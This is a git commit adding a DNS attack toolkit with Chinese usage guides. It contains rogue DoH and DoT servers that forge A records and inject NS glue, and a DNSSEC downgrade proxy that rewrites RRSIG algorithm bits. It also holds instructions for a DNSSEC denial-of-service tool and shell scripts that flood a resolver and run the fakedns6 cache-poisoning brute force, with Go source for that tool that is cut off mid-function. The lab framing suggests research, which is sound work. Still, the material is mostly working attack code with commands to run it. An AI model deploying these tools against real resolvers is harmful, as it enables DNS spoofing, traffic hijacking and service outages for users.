first commit

2024-09-30 15:52:30 +08:00
parent 0c6dfbed50
commit 96107bbdcd
68 changed files with 3789 additions and 0 deletions
--- a/10_doh_injection/DoH数据注入.pdf
+++ b/10_doh_injection/DoH数据注入.pdf
--- a/10_doh_injection/fake_DoH.py
+++ b/10_doh_injection/fake_DoH.py
@@ -0,0 +1,63 @@
 import argparse
 import base64
 import ssl
 import dns.asyncquery
 import dns.rcode
 import aiohttp
 import dns.message
 import dns.rrset
 from aiohttp import web
 DNS_SERVER_ADDRESS = '223.5.5.5'
 DNS_SERVER_PORT = 53
 async def doh_handler(request):
    if request.method == "GET":
        rquery = str(request.query).split(' ')[1]
        #print(rquery)
        rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
        doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
    else:
        try:
            doh_request = dns.message.from_wire(await request.read())
        except :
            return web.Response(text='Invalid DNS request', status=400)
    dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
    dns_request.id = doh_request.id
    # 发起DNS请求
    dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
    #print(dns_response)
    if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
        print('---tamper---',tamper)
        dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
    if str(doh_request.question[0].name) == inject:
        print('---inject---',inject)
        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
    #print(dns_response)
    # 构建HTTPS响应
    response = web.Response(body=dns_response.to_wire())
    response.content_type = 'application/dns-message'
    return response
 parser = argparse.ArgumentParser()
 parser.add_argument('-tamper', '--tamper', default='')
 parser.add_argument('-inject', '--inject', default='')
 parser.add_argument('-ns', '--ns', default='39.106.44.126')
 args = parser.parse_args()
 tamper = args.tamper +'.'
 inject = args.inject +'.'
 ns = args.ns
 #print('tamper:',tamper)
 DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
 CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
 KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
 ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
 ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
 app = web.Application()
 app.router.add_get(path='/dns-query',handler=doh_handler)
 app.router.add_post(path='/dns-query',handler=doh_handler)
 web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)
--- a/11_dot_injection/DoT数据注入.pdf
+++ b/11_dot_injection/DoT数据注入.pdf
--- a/11_dot_injection/dot_stub.py
+++ b/11_dot_injection/dot_stub.py
@@ -0,0 +1,45 @@
 import socket
 import ssl
 import dns.message
 import dns.query
 import dns.rcode
 import argparse
 parser = argparse.ArgumentParser()
 parser.add_argument('-dot', '--dot', default='dns.alidns.com')
 args = parser.parse_args()
 print(f'DoT server: {args.dot}')
 upstream_server = '47.88.31.213'
 # 创建监听socket
 listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 listener.bind(('127.0.0.1', 53))
 # 创建TLS连接
 context = ssl.create_default_context()
 context.check_hostname = False
 context.verify_mode = ssl.CERT_NONE
 while True:
        # 接收DNS请求
    data, addr = listener.recvfrom(1024)
    #print(dns.message.from_wire(data))
    data = dns.message.from_wire(data)
    if 'baidu' in data.question.__str__():
        # print(data)
        # print(addr)
        print('DNS请求：', data.question)
        # # 创建TLS连接并发送DNS请求到上游服务器
        resp = dns.query.tls(
            q=data,
            where=upstream_server,
            timeout=10,
            ssl_context=context)
        print('DNS响应：', resp.answer)
        # with socket.create_connection((upstream_server,853)) as sock:
        #     with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
        #         tls_sock.sendall(data.to_wire())
        #         resp = tls_sock.recv(4096)
        # 将上游服务器的响应发送回客户端
        listener.sendto(resp.to_wire(), addr)
        break
--- a/11_dot_injection/fake_DoT.py
+++ b/11_dot_injection/fake_DoT.py
@@ -0,0 +1,63 @@
 import argparse
 import asyncio
 import ssl
 import socket
 import dns.asyncquery
 import dns.message
 import dns.rcode
 import dns.flags
 import dns.message
 import dns.rrset
 from dnslib import DNSRecord
 async handle_client(reader, writer):
    request_data = await reader.read(1024)
    request =  dns.message.from_wire(request_data[2:])
    #print(request)
    dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
    dns_request.id = request.id
    #print(dns_request)
    dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
    #print(dns_response)
    if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
        print('---tamper---', tamper)
        dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
    if str(request.question[0].name) == inject:
        print('---inject---', inject)
        dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
                                   dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
    #print(dns_response)
    response_data = dns_response
    record_header = len(response_data.to_wire()).to_bytes(2, 'big')
    # 构建完整的TLS响应数据
    tls_response_data = record_header + response_data.to_wire()
    writer.write(tls_response_data)
    await writer.drain()
    writer.close()
 async start_server():
    # 配置服务器参数
    listen_address = '0.0.0.0'
    listen_port = 853
    CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"  # 替换为你的SSL证书文件路径
    KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"  # 替换为你的SSL密钥文件路径
    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
    # 创建TCP服务器
    server = await asyncio.start_server(
        handle_client, listen_address, listen_port, ssl=context)
    print(f'DoT server listening on {listen_address}:{listen_port}')
    async with server:
        await server.serve_forever()
 parser = argparse.ArgumentParser()
 parser.add_argument('-tamper', '--tamper', default='')
 parser.add_argument('-inject', '--inject', default='')
 parser.add_argument('-ns', '--ns', default='39.106.44.126')
 args = parser.parse_args()
 tamper = args.tamper +'.'
 inject = args.inject +'.'
 ns = args.ns
 asyncio.run(start_server())
--- a/12_TargetGZ/TargetGZ_Client
+++ b/12_TargetGZ/TargetGZ_Client
--- a/12_TargetGZ/fpdns_client
+++ b/12_TargetGZ/fpdns_client
--- a/12_TargetGZ/fpdns_server
+++ b/12_TargetGZ/fpdns_server
--- a/12_TargetGZ/topology.png
+++ b/12_TargetGZ/topology.png
--- a/12_TargetGZ/说明.md
+++ b/12_TargetGZ/说明.md
@@ -0,0 +1,66 @@
 ## 使用说明
 ### 基本目标
 通过主动探测精确感知目标DNS服务的各项参数。
 ### 软件环境
 目标感知中共需要3种软件，如下表所示，其中主要测试对象为目录中的目标感知工具fpdns_client和辅助感知工具fpdns_server，BIND9递归解析器作为感知目标。
 | 软件名称 | 版本 | 作用 | 备注 |
 | ------- | ---- | ---- | ---- |
 |目标感知工具|v1.0|进行目标感知||
 |辅助感知工具|v1.0|辅助进行目标感知||
 |BIND9|9.11.36|作为感知目标||
 ### 硬件环境
 测试中共需要2台服务器A和B。服务器均为公有云VPS，基本配置为Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存。
 |硬件名称|数量|配置|作用|
 |---|---|---|---|
 |公有云VPS|2|Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存|安装运行必要软件|
 ### 测试拓扑
 测试拓扑如下图。
 ![](topology.png)
 ### 部署方法
 #### 感知目标部署
 在服务器A上安装BIND9，设置模式为递归解析模式。
 #### 目标感知工具部署
 将可执行文件fpdns_client移动到服务器A上。
 #### 辅助感知工具部署
 将可执行文件fpdns_server移动到服务器C上。
 ### 使用方法
 #### 辅助感知工具
 |参数|说明|示例|
 |---|---|---|
 |-sld|感知中使用的二级域名|echodns.xyz|
 #### 拒绝服务攻击工具
 |参数|说明|示例|
 |---|---|---|
 |-target|感知目标的IP地址|1.2.3.4|
 ### 测试方法
 1. 在服务器A上启动BIND9递归解析器；
 2. 在服务器B上执行命令`./fpdns_server -sld echodns.xyz`，启动辅助感知工具；
 3. 在服务器A上执行命令`./dtool -target {ip}`，进行目标感知
 4. 等待感知完毕，通过输出结果判断感知效果
--- a/12_TargetGZ/请删除我.txt
+++ b/12_TargetGZ/请删除我.txt
--- a/1_dnssec_ddos/ddos-topology.png
+++ b/1_dnssec_ddos/ddos-topology.png
--- a/1_dnssec_ddos/dtool
+++ b/1_dnssec_ddos/dtool
--- a/1_dnssec_ddos/rogue-ns
+++ b/1_dnssec_ddos/rogue-ns
--- a/1_dnssec_ddos/说明.md
+++ b/1_dnssec_ddos/说明.md
@@ -0,0 +1,73 @@
 ## 使用说明
 ### 基本目标
 通过向目标域名解析服务器发送特定请求，使目标服务器服务质量下降或无法提供服务，形成拒绝服务攻击。
 ### 软件环境
 DNSSEC拒绝服务攻击中共需要4种软件，如下表所示，其中主要测试对象为目录中的拒绝服务攻击工具dtool和辅助攻击工具rogue-ns，dig工具用于从客户端发起DNS查询并查看解析结果,docker用于运行必要的DNS服务器和监控组件容器。
 | 软件名称 | 版本 | 作用 | 备注 |
 | ------- | ---- | ---- | ---- |
 |拒绝服务攻击工具|v1.0|发送拒绝服务攻击请求||
 |辅助攻击工具|v1.0|辅助进行拒绝服务攻击||
 |dig|9.11.36|发起DNS查询并查看解析结果||
 |docker|24.0.5|安装必要容器||
 ### 硬件环境
 测试中共需要三台服务器A，B和C。服务器均为公有云VPS，基本配置为Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存。
 |硬件名称|数量|配置|作用|
 |---|---|---|---|
 |公有云VPS|3|Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存|安装运行必要软件|
 ### 测试拓扑
 测试拓扑如下图。
 ![](ddos-topology.png)
 ### 部署方法
 #### 目标及监控部署
 在服务器B上通过docker安装BIND9容器作为攻击目标，安装cadvisor，prometheus和grafana进行服务器B的状态监控。
 #### 拒绝服务攻击工具部署
 将可执行文件dtool移动到服务器A上。
 #### 辅助攻击工具部署
 将可执行文件rogue-ns移动到服务器C上。
 ### 使用方法
 #### 辅助攻击工具
 |参数|说明|示例|
 |---|---|---|
 |-sld|攻击中使用的二级域名|echodns.xyz|
 #### 拒绝服务攻击工具
 |参数|说明|示例|
 |---|---|---|
 |query|攻击中使用的二级域名|echodns.xyz|
 |-p|目标端口|53|
 |-d|攻击中使用的域名后缀|rogue.echodns.xyz|
 |-R|是否进行域名随机生成，布尔型参数||
 |-r|发送请求速率|100|
 |-n|发送请求总量|10000|
 ### 测试方法
 1. 在服务器B上启动BIND9容器；
 2. 在服务器C上执行命令`./rogue-ns -sld echodns.xyz`，启动辅助攻击工具；
 3. 在服务器A上执行命令`./dtool query {ip} -p 5353 -R -d rogue.jtfgzlm.icu -r 300 -n 60000`，启动拒绝服务攻击脚本向目标进行攻击；
 4. 通过服务器B上3000端口的grafana仪表盘监控目标状态；
 5. 在服务器A上使用dig向目标进行DNS查询，通过解析时延和超时情况判断攻击效果。
--- a/2_dnssec_Downgrade/downgrade-topology.png
+++ b/2_dnssec_Downgrade/downgrade-topology.png
--- a/2_dnssec_Downgrade/proxy.py
+++ b/2_dnssec_Downgrade/proxy.py
@@ -0,0 +1,196 @@
 # -*- coding: utf-8 -*-
 import socket
 import dns.message
 import dns.rdatatype
 import dns.rdata
 import dns.rdataclass
 import binascii
 import csv
 import datetime
 from scapy.all import *
 #from crypto.PublicKey import Ed448
 #import dns.rdatatype
 # 定义代理服务器的地址和端口
 proxy_host = '10.0.8.14'  # 代理服务器的IP地址
 proxy_port = 53  # 代理服务器的端口
 #proxy_port =  22  # 代理服务器的端口
 # 定义上游DNS服务器的地址和端口
 upstream_host = '127.0.0.1'  # 上游DNS服务器的IP地址
 upstream_port = 9999  # 上游DNS服务器的端口
 csv_file = "dnssec_log.csv"
 def proxy_dns_request(request, client_addr, proxy_socket):
    # 创建与上游DNS服务器的套接字连接
    upstream_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # 发送DNS请求到上游DNS服务器
    upstream_socket.sendto(request, (upstream_host, upstream_port))
    # 接收上游DNS服务器的响应
    response, _ = upstream_socket.recvfrom(4096)
    # 修改DNS应答中的字段
    modified_response = modify_dns_response(response,client_addr,len(request))
    #modified_response = response
    # 将修改后的DNS应答发送给客户端
    #client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    #client_socket.sendto(modified_response, client_addr)
    proxy_socket.sendto(modified_response, client_addr)
    # print("finish",client_addr)
    # 关闭套接字连接
    upstream_socket.close()
    #client_socket.close()
 def modify_dns_response(response,client_addr,len_request):
    # 在这里添加你的修改逻辑
    # 解析DNS应答消息，并修改需要的字段
    # 可以使用dnspython等DNS库来解析和构造DNS消息
  #  print("response ",response)
    dns_response = dns.message.from_wire(response)
    # print("dns_response ",dns_response)
    qweasd = 0
    packet = DNS(response)
        # 解析DNS流量
    if DNS in packet:
        dns1 = packet[DNS]
        if dns1.qd[0].qtype != 1:
            print("************No Change************")
            return response
        if dns1.ancount > 0:
            print("Answers:")
            for an in dns1.an:
                print("  Name:", an.rrname.decode())
                print("  Type:", an.type)
                #print("  Data:", an.rdata)
    for rrset in dns_response.answer:
        if rrset.rdtype == dns.rdatatype.RRSIG and qweasd == 0  :
            qweasd = 1
            current_time = datetime.now()
            # with open(csv_file, "a", newline="") as file:
                # writer = csv.writer(file)
                # writer.writerow([client_addr, len_request, current_time])
            # print("dnssec_log.csv:",csv_file)
            # new_rdata = dns.rdata.from_text(rrset.rdclass, rrset.rdtype, rrset.to_text())
            # new_rdata.algorithm = 16  # 设置为 5 或其他你想要的值
            # 替换原始 RRSIG 记录
            # rrset.clear()
            # rrset.add(new_rdata)
            # for attrr in dir(rrset):
                # print(attrr)
 #     print("rdata.algorithm",rrset.algorithm)
            # new_rdata = dns.rdatatype.from_text(rdtype_text.replace(dns.rdatatype.RSASHA1,dns.rdatatype.ED448))
            # rrset.items = new_rdata
       #     print(rrset.items)
 #           print(rrset[1])
 #            print(bin(rrset.items[1]))
     #       for qwe in rrset:
                #print(qwe)
                #print(type(qwe)," key:   ",qwe,"   qweqweqweqweqwe           ")   
     #           for attrr in dir(qwe):
     #               print(attrr)
     #           qwe.algorithm = 16
            #    print(qwe.algorithm)
    # 遍历DNS响应中的资源记录
            modified_response = dns_response.to_wire()
            binary_string = bin(int(binascii.hexlify(modified_response), 16))
      #      print("len: ",len(binary_string),"\n",binary_string)
            formatted_string = str(binary_string)
            index = str(binary_string).find("01100101001000001101110000001111")
            new_string = formatted_string[:index+1] + '0' + formatted_string[index+2:]
            new_string = new_string[:index+2] + '1' + new_string[index+3:]
            new_string = new_string[:index+3] + '0' + new_string[index+4:]
            new_string = new_string[:index+4] + '0' + new_string[index+5:]
            new_string = new_string[:index+5] + '1' + new_string[index+6:]
            new_string = new_string[:index+6] + '0' + new_string[index+7:]
            formatted_string = new_string[:index+7] + '1' + new_string[index+8:]
            # index = str(binary_string).find("0000010100000011")
            index = str(binary_string).find("0000110100000011")
 #    formatted_string = str(binary_string)
            new_string = formatted_string[:index+1] + '1' + formatted_string[index+2:]
            new_string = new_string[:index+2] + '1' + new_string[index+3:]
            new_string = new_string[:index+3] + '1' + new_string[index+4:]
            new_string = new_string[:index+4] + '0' + new_string[index+5:]
            new_string = new_string[:index+5] + '0' + new_string[index+6:]
            new_string = new_string[:index+6] + '0' + new_string[index+7:]
            formatted_string = new_string[:index+7] + '0' + new_string[index+8:]
   # print("len: ",len(formatted_string),"\n",formatted_string) 
   # print("index: ",formatted_string[index:])
            binary_string = formatted_string[2:]
            binary_number = int(binary_string, 2)
            formatted_string = binary_number.to_bytes((binary_number.bit_length() + 7) // 8, 'big')
     #       print("index: ",formatted_string)
            try:
                dns_response = dns.message.from_wire(formatted_string)
            except:
                modified_response = dns_response.to_wire()
     #       print(dns_response)
    modified_response = dns_response.to_wire()
    print("**********************************************************************************************************************")
    return modified_response
 def start_proxy_server():
    # 创建代理服务器的套接字
    proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # 将套接字绑定到代理服务器的地址和端口
    proxy_socket.bind((proxy_host, proxy_port))
    # 循环监听客户端请求并代理流量
    num = 1
    print("START:  ")
    while True:
        print("start")
        request, client_addr = proxy_socket.recvfrom(4096)
        print("num: ",num)
        num = num + 1
        try:
            packet = DNS(request)
            # 解析DNS流量
            if DNS in packet:
                dns1 = packet[DNS]
                if dns1.qdcount > 0:
                    print("Queries:")
                    for qd in dns1.qd:
                        print("  Query Name:", qd.qname.decode())
                        print("  Query Type:", qd.qtype)
                        print("  Query Class:", qd.qclass)
                        query_current_time = datetime.now()
                        query_current_time = query_current_time.strftime("%H%M%S%f")[:-2]
                    #    src = request[IP].src
                        print("  Query src:", client_addr)
                        print("  Query Current Time:", query_current_time)
                        tmp = qd.qname.decode()
                        if tmp[0] == "D":
                            with open("shiyan1_query", "a", newline="") as file:
                                writer = csv.writer(file)
                                writer.writerow([qd.qname.decode(), qd.qtype, qd.qclass, client_addr, query_current_time])
                            print("finish")
        except Exception as e:
            print("error",str(e))
        proxy_dns_request(request, client_addr, proxy_socket)
    # 关闭套接字连接
    proxy_socket.close()
 # 启动代理服务器
 start_proxy_server()
--- a/2_dnssec_Downgrade/说明.md
+++ b/2_dnssec_Downgrade/说明.md
@@ -0,0 +1,52 @@
 ## 使用说明
 ### 基本目标
 使目标DNS解析器不对DNSSEC记录进行验证，实现针对DNSSEC的降级攻击
 ### 软件环境
 DNSSEC降级攻击中共需要四种软件，如下表所示，其中主要测试对象为目录中的DNSSEC绕过工具脚本proxy.py，BIND9用于搭建权威服务器和递归解析器，dig工具用于从客户端发起DNS查询并查看解析结果，python用于运行DNSSEC绕过工具。
 | 软件名称 | 版本 | 作用 | 备注 |
 | ------- | ---- | ---- | ---- |
 |DNSSEC绕过工具|v1.0|实现中间人篡改功能|proxy.py|
 |BIND9|9.18.2|搭建权威服务器和递归解析器||
 |dig|9.11.36|发起DNS查询并查看解析结果||
 |python|3.7.2|运行DNSSEC绕过工具||
 ### 硬件环境
 测试中共需要三台服务器A和B。服务器A和B均为公有云VPS，基本配置为Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存。
 |硬件名称|数量|配置|作用|
 |---|---|---|---|
 |公有云VPS|2|Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存|安装运行必要软件|
 ### 测试拓扑
 测试拓扑如下图。
 ![拓扑](downgrade-topology.png)
 ### 部署方法
 #### BIND9部署
 在服务器B上安装并配置BIND9作为权威服务器，并进行权威域的DNSSEC配置。
 在服务器A上安装并配置BIND9作为递归解析器，开启DNSSEC验证功能。
 #### DNSSEC绕过工具部署
 在服务器B上安装python3，将proxy.py脚本移动到服务器上。
 ### 工具使用方法
 DNSSEC绕过工具无输入参数，直接通过`python3 proxy.py`运行。
 ### 测试方法
 1. 在服务器B上启动权威服务器，监听9999端口；
 2. 在服务器B上执行python3 proxy.py命令，启动DNSSEC绕过工具；
 3. 在服务器A上使用dig向本地的递归解析器查询ns3.jtfgzlm.icu，通过解析结果验证DNSSEC降级攻击效果
--- a/3_v6_DDoS/code
+++ b/3_v6_DDoS/code
--- a/3_v6_DDoS/说明文档.docx
+++ b/3_v6_DDoS/说明文档.docx
--- a/4_v6_injection/Readme.md
+++ b/4_v6_injection/Readme.md
@@ -0,0 +1,3 @@
 ## 使用说明
 ./attack.sh 【目标解析器IP】【想要将AAAA记录修改指向的IPv6地址】 【发包网口(例如eth0)】 【目标域名】【目标权威服务地址】
--- a/4_v6_injection/attack.sh
+++ b/4_v6_injection/attack.sh
@@ -0,0 +1,55 @@
 #!/bin/bash
 # This is a sample attack script and may not work properly. Please adjust the parameter accordingly.
 # $1 for victim resolver IP, $2 for attacker-controlled domain, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP
 # Please run with sudo.
 # Verify the existing record domain, just for proof purposes.
 echo '获取原记录中:'
 dig @$1 $4 AAAA
 sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
 var=0
 num=0
 success=0
 while [ $success -ne 1 ]
 do
  success=0
  echo "等待缓存过期，$sleeptime秒之后开始攻击..."
  sleep $sleeptime
  echo "开始攻击"
  # flood
  echo "攻击参数："
  echo "目标域名权威服务地址:$5"
  echo "目标解析服务地址:$1"
  echo "目标域名:$4"
  ret=$(./dns_query.sh $1 $2 $3 $4)
  #echo "ret:$ret"
  echo "初始化工具环境"
  sleep 1
  echo "尝试触发权威服务器请求速率限制"
  sleep 3
  FINAL=`echo ${ret: -1}`
  #echo "fin:$FINAL"
  # Start attack
  # Change the argument accordingly
  echo "执行侧信道攻击脚本中"
  ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
  # a - 进行域名缓存投毒的权威服务器
  # b -
  sleep 30
  # Validations
  ((var++))
  echo "第$var轮次攻击结束"
  dig @$1 $4 AAAA
  if [ "$FINAL" == "0" ];then
 	success=1
 	sleeptime=0
  fi
  echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
 done
 # success
 echo '检测到攻击成功实现'
 echo '等待两秒，再次请求...'
 sleep 2
 dig @$1 $4 AAAA
 echo '攻击已完成！！！！'
--- a/4_v6_injection/dns.bin
+++ b/4_v6_injection/dns.bin
--- a/4_v6_injection/dns_OPT.bin
+++ b/4_v6_injection/dns_OPT.bin
--- a/4_v6_injection/dns_end.bin
+++ b/4_v6_injection/dns_end.bin
--- a/4_v6_injection/dns_mid.bin
+++ b/4_v6_injection/dns_mid.bin
@@ -0,0 +1 @@
 attackduktigxyz
--- a/4_v6_injection/dns_query.sh
+++ b/4_v6_injection/dns_query.sh
@@ -0,0 +1,50 @@
 # usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www google com)]
 # clear the previous files
 sleep 1
 echo "初始化工具环境"
 # 创建空的二进制文件，dns_mid.bin 和 txid.bin
 dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
 dd if=/dev/null of=txid.bin > /dev/null 2>&1
 # write the domain name into the binary
 domains=$(echo $4| sed "s/\./ /g")    # 将域名转换为空格分隔的字符串
 for var in ${domains:0}   # 遍历域名的每个部分
 do
  size=${#var}  # 获取当前域名的长度
  echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin   # 写入长度
  echo -n "$var" >> dns_mid.bin     # 写入域名
 done
 # set a random TxID
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 # forge a entire DNS query packet
 cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
 # change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
 # fire!
 echo "尝试触发权威服务器请求速率限制"
 # 使用udp6工具发送DNS查询数据包，指定目标和速率
 udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
 sleep 1
 a=$(($RANDOM % 9 + 1))
 echo "a:$a"
 if [ $a -gt 6 ]; then
  #echo "dns-TIP:$1"
  #echo "dns-WIP:$2"
  #echo "dns-iface:$3"
  #echo "dns-domain:$4"
  ./fakedns6 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1
  # b, Back-end IP of the victim resolver, 目标解析器的IP地址
  # i, Interface for attacking, 攻击使用的接口
  # n, the domain name to be poisoned, 要进行缓存投毒的域名
  # r, Front-end IP of the victim resolver
  # t, Timeout in ms for outgoing dns queries to the victim resolver
  # at, 攻击者想要更改到的IP地址
  # tg, time gap is us between the TxID brute force packets
  echo "0"
 fi
--- a/4_v6_injection/dns_start.bin
+++ b/4_v6_injection/dns_start.bin
--- a/4_v6_injection/fakedns6
+++ b/4_v6_injection/fakedns6
--- a/4_v6_injection/fakedns6-演示.zip
+++ b/4_v6_injection/fakedns6-演示.zip
--- a/4_v6_injection/src/ucr.edu/fakedns6/attack.go
+++ b/4_v6_injection/src/ucr.edu/fakedns6/attack.go
@@ -0,0 +1,714 @@
 package main
 import (
 	"flag"
 	"fmt"
 	"log"
 	"math/rand"
 	"net"
 	"os"
 	"strconv"
 	"strings"
 	"sync"
 	"time"
 	"github.com/google/gopacket"
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
 	"github.com/google/gopacket/routing"
 	"github.com/miekg/dns"
 )
 var handle *pcap.Handle
 var ethernetLayer *layers.Ethernet
 var victimDNSName string
 var dnsQueryName string
 var authIP net.IP
 var resolverIP net.IP
 var localIP []net.IP
 var defaultJitter uint
 var gotReply = false
 var attackerControlledDomain string
 var attackForwarder bool
 var repeatTimes int
 var timeGap uint
 var auxiliaryDomain string
 var soaName string
 var jitter uint = 10
 var rtt uint = 1 // in ms
 var debugOutput = true
 const GROUP_SIZE = 50
 /* I'm not sure what's this used for. Probably used with older version where multiple IPs is not supported. */
 //var sendingChannel chan *outgoingPacket
 var backendResolvers = make([]*backendResolver, 0)
 var bruteForceShouldBeKilled = false
 type backendResolver = struct {
 	resolverBackendIP net.IP
 	groups             [][]uint16 // = make([][]uint16, 65536)
 	groupIDCounter     uint32     // = 3
 	groupIDCounterLock *sync.Mutex
 	groupSendTime      []time.Time // = make([]time.Time, 65536)
 	probeChannel         chan uint32 //= make(chan uint16, 655)
 	priorityProbeChannel chan uint32 //= make(chan uint16, 655)
 	alwaysOpenPorts      []bool      //= make([]bool, 65536)
 	perIPLimitCounter []int //= 6
 	networkXmitLock *sync.Mutex
 }
 // timeout in ms
 func dnsRequestSender(timeout uint) {
 	for {
 		gotReply = false
 		sendDNSRequest(uint16(rand.Uint32()), dnsQueryName)
 		retryTimes := timeout / 500
 		for {
 			if !gotReply {
 				time.Sleep(500 * time.Millisecond)
 				retryTimes--
 				if retryTimes == 0 {
 					break
 				}
 			} else {
 				if debugOutput {
 					fmt.Println("Got reply in", timeout-retryTimes*500, "ms")
 				} else {
 					fmt.Println("Rx")
 				}
 				break
 			}
 		}
 		if !attackForwarder {
 			dnsQueryName = strconv.Itoa(rand.Int()) + "." + victimDNSName
 		} else {
 			/* I'm not sure if we should change the nonce. */
 			dnsQueryName = strconv.Itoa(rand.Int()) + "." + attackerControlledDomain
 		}
 	}
 }
 func receivingThread() {
 	for {
 		data, captureInfo, err := handle.ReadPacketData()
 		if err == pcap.NextErrorTimeoutExpired {
 			continue
 		} else if err != nil {
 			log.Printf("error reading packet: %v", err)
 			continue
 		}
 		// Parse the packet.  We'd use DecodingLayerParser here if we
 		// wanted to be really fast.
 		packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
 		// Find the packets we care about, and print out logging
 		// information about them.  All others are ignored.
 		if rspNet := packet.NetworkLayer(); rspNet == nil {
 			continue
 		} else if rspIPLayer := packet.Layer(layers.LayerTypeIPv6); rspIPLayer == nil {
 			continue
 			//} else if rspIP := rspIPLayer.(*layers.IPv4); rspIP == nil {
 		} else if rspIP := rspIPLayer.(*layers.IPv6); rspIP == nil {
 			continue
 		} else if rspIP.NextHeader != layers.IPProtocolICMPv6 {
 			if rspIP.FlowLabel != 2 && rspIP.NextHeader == layers.IPProtocolUDP && compareIPv6Addr(rspIP.SrcIP, resolverIP) == 0 {
 				rspUDPLayer := packet.Layer(layers.LayerTypeUDP)
 				if rspUDPLayer != nil && rspUDPLayer.(*layers.UDP).SrcPort == 53 {
 					rspDNSLayer := packet.Layer(layers.LayerTypeDNS)
 					if rspDNSLayer != nil {
 						rspDNS := rspDNSLayer.(*layers.DNS)
 						if rspDNS.QR == true {
 							if len(rspDNS.Authorities) != 0 && rspDNS.ResponseCode == layers.DNSResponseCodeNXDomain && string(rspDNS.Questions[0].Name) == dnsQueryName &&
 								string(rspDNS.Authorities[0].Name) == victimDNSName && string(rspDNS.Authorities[0].SOA.MName) == soaName {
 								fmt.Println("Success!!")
 								os.Exit(0)
 								//unbound won't cache NS record that leads to SOA NXDOMAIN reply, so we make it positive response
 								//This is also used for forwarder attack
 							} else if string(rspDNS.Questions[0].Name) == dnsQueryName && rspDNS.ResponseCode == layers.DNSResponseCodeNoErr {
 								for _, record := range rspDNS.Answers {
 									if record.Type == layers.DNSTypeAAAA {
 										fmt.Println("Success2!!")
 										os.Exit(0)
 									}
 								}
 							} else if string(rspDNS.Questions[0].Name) == dnsQueryName {
 								gotReply = true
 							}
 						}
 					}
 				}
 			}
 			continue
 		} else if rspICMPLayer := packet.Layer(layers.LayerTypeICMPv6); rspICMPLayer == nil {
 			continue
 		} else if rspICMP, ok := rspICMPLayer.(*layers.ICMPv6); !ok {
 			continue
 		} else if rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodePortUnreachable) &&
 			rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodeAdminProhibited) {
 			continue
 		} else if nestedIpData := rspICMP.Payload; nestedIpData == nil {
 			continue
 		} else if nestedIpPacket := gopacket.NewPacket(nestedIpData, layers.LayerTypeIPv6, gopacket.NoCopy); nestedIpPacket == nil {
 			continue
 		} else if nestedIpLayer := nestedIpPacket.Layer(layers.LayerTypeIPv6); nestedIpLayer == nil {
 			continue
